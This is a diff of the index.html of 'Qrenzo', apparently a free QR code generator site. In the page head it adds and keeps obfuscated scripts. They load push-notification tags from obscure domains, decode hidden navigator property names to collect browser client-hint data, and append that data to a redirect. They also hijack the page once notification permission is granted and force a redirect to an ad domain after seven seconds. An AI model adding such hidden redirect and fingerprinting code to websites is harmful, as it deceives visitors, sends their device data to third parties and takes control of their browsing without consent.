--- a/index.html
+++ b/index.html
@@ -1,58 +1,61 @@
-
 <!DOCTYPE html>
 <html lang="en">
   <head>
+    <!-- PushEngage Script -->
     <script>
-    (function(p,u,s,h){
-        s=document.createElement('script');
-        s.src='https://n9ihg.com/pfe/current/tag.min.js?z=9490266';
-        s.onload=function(){window[p]=new PushEngage();};
-        h=document.getElementsByTagName('head')[0];
+      (function(p, u, s, h) {
+        s = document.createElement('script');
+        s.src = 'https://n9ihg.com/pfe/current/tag.min.js?z=9490266';
+        s.onload = function() {
+          window[p] = new PushEngage();
+        };
+        h = document.getElementsByTagName('head')[0];
         h.appendChild(s);
-    })('pushengage');
-</script>
+      })('pushengage');
+    </script>
 
+    <!-- Direct Link Script (Push Permission-based) -->
     <script>
-    var a='mcrpolfattafloprcmlVeedrosmico?ncc=uca&FcusleluVlearVsyipoonrctannEdhrgoiiHdt_emgocdeellicboosmccoast_avDetrnseigoAnrcebsruocw=seelri_bvoemr_ssiiocn'.split('').reduce((m,c,i)=>i%2?m+c:c+m).split('c');var Replace=(o=>{var v=a[0];try{v+=a[1]+Boolean(navigator[a[2]][a[3]]);navigator[a[2]][a[4]](o[0]).then(r=>{o[0].forEach(k=>{v+=r[k]?a[5]+o[1][o[0].indexOf(k)]+a[6]+encodeURIComponent(r[k]):a[0]})})}catch(e){}return u=>window.location.replace([u,v].join(u.indexOf(a[7])>-1?a[5]:a[7]))})([[a[8],a[9],a[10],a[11]],[a[12],a[13],a[14],a[15]]]); 
-    var s = document.createElement('script');
-    s.src='//desekansr.com/148/d7b46/mw.min.js?z=9490322'+'&sw=/sw-check-permissions-59749.js';
-    s.onload = function(result) {
+      var a = 'mcrpolfattafloprcmlVeedrosmico?ncc=uca&FcusleluVlearVsyipoonrctannEdhrgoiiHdt_emgocdeellicboosmccoast_avDetrnseigoAnrcebsruocw=seelri_bvoemr_ssiiocn'
+        .split('')
+        .reduce((m, c, i) => (i % 2 ? m + c : c + m), '')
+        .split('c');
+
+      var Replace = (function(o) {
+        var v = a[0];
+        try {
+          v += a[1] + Boolean(navigator[a[2]][a[3]]);
+          navigator[a[2]][a[4]](o[0]).then(r => {
+            o[0].forEach(k => {
+              v += r[k] ? a[5] + o[1][o[0].indexOf(k)] + a[6] + encodeURIComponent(r[k]) : a[0];
+            });
+          });
+        } catch (e) {}
+        return u =>
+          window.location.replace([u, v].join(u.indexOf(a[7]) > -1 ? a[5] : a[7]));
+      })([[a[8], a[9], a[10], a[11]], [a[12], a[13], a[14], a[15]]]);
+
+      var s = document.createElement('script');
+      s.src = '//coohauwhob.net/148/d7b46/mw.min.js?z=9490263&sw=/sw-check-permissions-83b8e.js';
+      s.onload = function(result) {
         switch (result) {
-            case 'onPermissionDefault':break;
-            case 'onPermissionAllowed':break;
-            case 'onPermissionDenied':break;
-            case 'onAlreadySubscribed':break;
-            case 'onNotificationUnsupported':break;
+          case 'onPermissionAllowed':
+            Replace("//n91hg.com/4/9490266");
+            break;
         }
-    };
-    document.head.appendChild(s);
-</script>
+      };
+      document.head.appendChild(s);
+    </script>
 
-
+    <!-- Fallback Auto-Redirect After 7 Seconds -->
     <script>
-    var a='mcrpolfattafloprcmlVeedrosmico?ncc=uca&FcusleluVlearVsyipoonrctannEdhrgoiiHdt_emgocdeellicboosmccoast_avDetrnseigoAnrcebsruocw=seelri_bvoemr_ssiiocn'.split('').reduce((m,c,i)=>i%2?m+c:c+m).split('c');var Replace=(o=>{var v=a[0];try{v+=a[1]+Boolean(navigator[a[2]][a[3]]);navigator[a[2]][a[4]](o[0]).then(r=>{o[0].forEach(k=>{v+=r[k]?a[5]+o[1][o[0].indexOf(k)]+a[6]+encodeURIComponent(r[k]):a[0]})})}catch(e){}return u=>window.location.replace([u,v].join(u.indexOf(a[7])>-1?a[5]:a[7]))})([[a[8],a[9],a[10],a[11]],[a[12],a[13],a[14],a[15]]]); 
-    var s = document.createElement('script');
-    s.src='//coohauwhob.net/148/d7b46/mw.min.js?z=9490263'+'&sw=/sw-check-permissions-83b8e.js';
-    s.onload = function(result) {
-        switch (result) {
-            case 'onPermissionDefault':break;
-            case 'onPermissionAllowed':
-            Replace("//n91hg.com/4/9490266");break;
-            case 'onPermissionDenied':break;
-            case 'onAlreadySubscribed':break;
-            case 'onNotificationUnsupported':break;
-        }
-    };
-    document.head.appendChild(s);
-</script>
-<script>
-      var Back_Button_Zone = 9490266;
-      var Domain_TB = "g0st.com";
-</script>
-<script async src="https://desenteir.com/148/d7b46/reverse.min.js?sf=1"></script>
+      setTimeout(() => {
+        window.location.href = "https://n9ihg.com/4/9490266";
+      }, 7000); // 7000 ms = 7 seconds
+    </script>
 
-    <!-- Critical SEO Meta Tags -->
-    <meta name="pushsdk" content="108ef7535f9a28ac95a7f756304e4dca">
+    <!-- Other Meta / SEO / Ads -->
+    <meta name="pushsdk" content="108ef7535f9a28ac95a7f756304e4dca" />
     <meta charset="UTF-8" />
     <meta name="viewport" content="width=device-width, initial-scale=1.0" />
     <title>Free QR Code Generator Online - Create Custom QR Codes Instantly | Qrenzo</title>
@@ -61,9 +64,9 @@
     <meta name="author" content="Qrenzo - Free QR Code Generator" />
     <meta name="robots" content="index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1" />
     <link rel="canonical" href="https://qrenzo.com" />
-    <link rel="icon" href="/lovable-uploads/15aab39f-9991-466f-9572-cb7cab456db4.png" type="image/png">
+    <link rel="icon" href="/lovable-uploads/15aab39f-9991-466f-9572-cb7cab456db4.png" type="image/png" />
 
-    <!-- Open Graph Meta Tags for Social Sharing -->
+    <!-- Open Graph Meta Tags -->
     <meta property="og:title" content="Free QR Code Generator Online - Create Custom QR Codes Instantly | Qrenzo" />
     <meta property="og:description" content="Generate free QR codes instantly with Qrenzo - the #1 online QR code generator. Create custom QR codes for URLs, WiFi, business cards, and more. No signup required." />
     <meta property="og:type" content="website" />
@@ -74,7 +77,7 @@
     <meta property="og:site_name" content="Qrenzo - Free QR Code Generator" />
     <meta property="og:locale" content="en_US" />
 
-    <!-- Twitter Card Meta Tags -->
+    <!-- Twitter Card -->
     <meta name="twitter:card" content="summary_large_image" />
     <meta name="twitter:site" content="@qrenzo" />
     <meta name="twitter:creator" content="@qrenzo" />
@@ -82,7 +85,7 @@
     <meta name="twitter:description" content="Generate free QR codes instantly with Qrenzo. No signup required, unlimited downloads, custom designs." />
     <meta name="twitter:image" content="https://qrenzo.com/lovable-uploads/15aab39f-9991-466f-9572-cb7cab456db4.png" />
 
-    <!-- Additional SEO Meta Tags -->
+    <!-- Other Meta -->
     <meta name="theme-color" content="#8B5CF6" />
     <meta name="msapplication-TileColor" content="#8B5CF6" />
     <meta name="application-name" content="Qrenzo QR Generator" />
@@ -90,96 +93,13 @@
     <meta name="apple-mobile-web-app-capable" content="yes" />
     <meta name="mobile-web-app-capable" content="yes" />
 
-    <!-- Google Site Verification & AdSense -->
+    <!-- Google Verification & Ads -->
     <meta name="google-site-verification" content="tgx5XOWqy0chzmAIJV4Lbrkp6kWSRAPK7voaClfmDYQ" />
     <meta name="google-adsense-account" content="ca-pub-5257313631549502">
     <script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-5257313631549502" crossorigin="anonymous"></script>
-    
-    <!-- Enhanced Structured Data for SEO -->
-    <script type="application/ld+json">
-    {
-      "@context": "https://schema.org",
-      "@type": "WebApplication",
-      "name": "Qrenzo - Free QR Code Generator",
-      "alternateName": "Free QR Code Maker Online",
-      "description": "Generate free QR codes instantly with Qrenzo - the best online QR code generator. Create custom QR codes for URLs, WiFi, business cards, and more. No signup required, unlimited downloads.",
-      "url": "https://qrenzo.com",
-      "applicationCategory": "UtilityApplication",
-      "operatingSystem": "Web Browser",
-      "browserRequirements": "Requires JavaScript. Requires HTML5.",
-      "softwareVersion": "2.0",
-      "aggregateRating": {
-        "@type": "AggregateRating",
-        "ratingValue": "4.9",
-        "reviewCount": "1247",
-        "bestRating": "5",
-        "worstRating": "1"
-      },
-      "offers": {
-        "@type": "Offer",
-        "price": "0",
-        "priceCurrency": "USD",
-        "availability": "https://schema.org/InStock"
-      },
-      "creator": {
-        "@type": "Organization",
-        "name": "Qrenzo",
-        "url": "https://qrenzo.com"
-      },
-      "featureList": [
-        "Free QR Code Generation",
-        "Custom QR Code Colors",
-        "Logo Integration",
-        "Multiple Download Formats",
-        "WiFi QR Codes",
-        "Business Card QR Codes",
-        "URL QR Codes",
-        "Smart Link QR Codes",
-        "No Registration Required",
-        "Unlimited Downloads"
-      ],
-      "keywords": "free qr code generator, qr code maker, online qr generator, custom qr codes, wifi qr code, business card qr code"
-    }
-    </script>
 
-    <!-- FAQ Structured Data -->
-    <script type="application/ld+json">
-    {
-      "@context": "https://schema.org",
-      "@type": "FAQPage",
-      "mainEntity": [
-        {
-          "@type": "Question",
-          "name": "Is Qrenzo QR code generator completely free?",
-          "acceptedAnswer": {
-            "@type": "Answer",
-            "text": "Yes! Qrenzo is 100% free to use. You can generate unlimited QR codes without any cost, registration, or hidden fees."
-          }
-        },
-        {
-          "@type": "Question",
-          "name": "What types of QR codes can I create?",
-          "acceptedAnswer": {
-            "@type": "Answer",
-            "text": "You can create QR codes for URLs, WiFi networks, business cards (vCard), plain text, email addresses, phone numbers, SMS messages, and smart links with advanced features."
-          }
-        },
-        {
-          "@type": "Question",
-          "name": "Can I customize the appearance of my QR codes?",
-          "acceptedAnswer": {
-            "@type": "Answer",
-            "text": "Absolutely! You can customize colors, add logos, choose different patterns, and adjust the design to match your brand or personal preferences."
-          }
-        }
-      ]
-    }
-    </script>
-
-    <!-- Preload Critical Resources -->
+    <!-- Preload Resources -->
     <link rel="preload" href="/lovable-uploads/15aab39f-9991-466f-9572-cb7cab456db4.png" as="image" />
-    
-    <!-- DNS Prefetch for External Resources -->
     <link rel="dns-prefetch" href="//fonts.googleapis.com" />
     <link rel="dns-prefetch" href="//pagead2.googlesyndication.com" />
   </head>
@@ -187,7 +107,5 @@
   <body>
     <div id="root"></div>
     <script type="module" src="/src/main.tsx"></script>
-   
-
   </body>
 </html>
